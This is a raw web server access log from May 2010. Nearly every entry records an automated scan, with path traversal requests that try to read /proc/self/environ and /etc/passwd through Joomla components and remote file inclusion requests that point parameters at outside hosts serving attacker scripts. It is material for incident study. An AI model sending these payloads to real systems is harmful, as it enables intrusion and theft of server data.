76.12.16.220 - - [25/May/2010:10:45:59 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.79"
211.132.187.170 - - [25/May/2010:10:47:08 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.65"
211.132.187.170 - - [25/May/2010:10:47:09 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
174.133.201.194 - - [25/May/2010:10:47:33 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:10:47:33 -0500] "GET /logs/access_log.1271548800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:10:47:33 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
94.23.18.102 - - [25/May/2010:10:47:43 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
211.132.187.170 - - [25/May/2010:10:48:04 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
70.38.31.166 - - [25/May/2010:10:48:53 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.810"
70.38.31.166 - - [25/May/2010:10:48:53 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
74.50.85.15 - - [25/May/2010:10:49:22 -0500] "GET ////bbs//////delete_comment.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.50.85.15 - - [25/May/2010:10:49:22 -0500] "GET /logs////bbs//////delete_comment.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.50.85.15 - - [25/May/2010:10:49:22 -0500] "GET /logs/access_log.1271548800////bbs//////delete_comment.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
75.125.131.10 - - [25/May/2010:10:49:43 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.834"
75.125.131.10 - - [25/May/2010:10:49:43 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
76.12.16.220 - - [25/May/2010:10:50:55 -0500] "GET /logs/access_log.1274313600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
81.93.240.99 - - [25/May/2010:10:50:59 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
81.93.240.99 - - [25/May/2010:10:50:59 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.132.187.170 - - [25/May/2010:10:51:43 -0500] "GET /logs/access_log.1273017600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.65"
211.132.187.170 - - [25/May/2010:10:51:43 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
211.132.187.170 - - [25/May/2010:10:51:43 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.65"
174.133.201.194 - - [25/May/2010:10:51:51 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:10:51:51 -0500] "GET /logs/access_log.1271548800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 352 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:10:51:51 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 330 "-""Mozilla/5.0"
76.12.16.220 - - [25/May/2010:10:52:34 -0500] "GET /logs/access_log.1273017600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
76.12.16.220 - - [25/May/2010:10:52:34 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
76.12.16.220 - - [25/May/2010:10:52:35 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.79"
75.125.247.170 - - [25/May/2010:10:52:36 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:37 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:38 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:39 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:40 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:41 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:42 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:43 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:45 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:46 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:47 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:48 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:49 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:49 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:50 -0500] "GET /index.php?option=com_spsnewsletter&controller=../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:51 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:53 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:54 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:55 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:56 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:57 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:58 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:52:59 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:53:00 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:53:01 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:53:02 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
122.201.90.164 - - [25/May/2010:10:53:26 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.823"
122.201.90.164 - - [25/May/2010:10:53:26 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
84.38.67.248 - - [25/May/2010:10:53:30 -0500] "GET /logs/index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
84.38.67.248 - - [25/May/2010:10:53:30 -0500] "GET /index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
207.46.204.231 - - [25/May/2010:10:53:31 -0500] "GET /logs/access_log.1157328000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.120.121.65 - - [25/May/2010:10:53:50 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
76.79.77.101 - - [25/May/2010:10:54:28 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
76.79.77.101 - - [25/May/2010:10:54:28 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
209.44.114.154 - - [25/May/2010:10:55:29 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.44.114.154 - - [25/May/2010:10:55:29 -0500] "GET /index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.114.154 - - [25/May/2010:10:55:29 -0500] "GET /logs/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
211.239.161.143 - - [25/May/2010:10:56:34 -0500] "GET //expanded.php?conf=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.239.161.143 - - [25/May/2010:10:56:35 -0500] "GET /logs//expanded.php?conf=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
69.94.137.93 - - [25/May/2010:10:56:52 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:56:52 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.239.161.143 - - [25/May/2010:10:56:56 -0500] "GET //admin.php?cal_dir=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.239.161.143 - - [25/May/2010:10:56:57 -0500] "GET /logs//admin.php?cal_dir=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
69.94.137.93 - - [25/May/2010:10:57:12 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:57:12 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:57:58 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:58:04 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:58:50 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:58:51 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:58:52 -0500] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:10:58:52 -0500] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
174.133.201.194 - - [25/May/2010:10:59:32 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:10:59:32 -0500] "GET /logs/access_log.1271548800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:10:59:32 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
124.217.229.185 - - [25/May/2010:10:59:40 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
61.100.181.218 - - [25/May/2010:11:00:11 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.100.181.218 - - [25/May/2010:11:00:11 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
174.121.93.221 - - [25/May/2010:11:00:23 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.93.221 - - [25/May/2010:11:00:23 -0500] "GET /index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.93.221 - - [25/May/2010:11:00:23 -0500] "GET /logs/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.93.221 - - [25/May/2010:11:00:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.93.221 - - [25/May/2010:11:00:30 -0500] "GET /index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.93.221 - - [25/May/2010:11:00:30 -0500] "GET /logs/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.23.18.102 - - [25/May/2010:11:01:00 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.18.102 - - [25/May/2010:11:01:00 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
211.132.187.170 - - [25/May/2010:11:01:05 -0500] "GET /logs/access_log.1274313600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.65"
216.108.234.39 - - [25/May/2010:11:01:21 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.823"
216.108.234.39 - - [25/May/2010:11:01:26 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
124.217.229.185 - - [25/May/2010:11:01:31 -0500] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [25/May/2010:11:01:31 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.250.255.243 - - [25/May/2010:11:01:39 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
211.239.161.143 - - [25/May/2010:11:01:49 -0500] "GET //Packages.php?sourcedir=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.239.161.143 - - [25/May/2010:11:01:49 -0500] "GET /logs//Packages.php?sourcedir=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
61.151.239.75 - - [25/May/2010:11:02:23 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
174.133.201.194 - - [25/May/2010:11:02:33 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:11:02:33 -0500] "GET /logs/access_log.1271548800//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.133.201.194 - - [25/May/2010:11:02:33 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
61.151.239.75 - - [25/May/2010:11:02:41 -0500] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
69.94.137.93 - - [25/May/2010:11:04:04 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:11:04:05 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:11:04:05 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:11:04:09 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:11:04:09 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.94.137.93 - - [25/May/2010:11:04:09 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
61.100.181.218 - - [25/May/2010:11:05:11 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
61.100.181.218 - - [25/May/2010:11:05:11 -0500] "GET /logs/access_log.1274313600/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
61.100.181.218 - - [25/May/2010:11:05:11 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
61.100.181.218 - - [25/May/2010:11:05:11 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
61.100.181.218 - - [25/May/2010:11:05:12 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
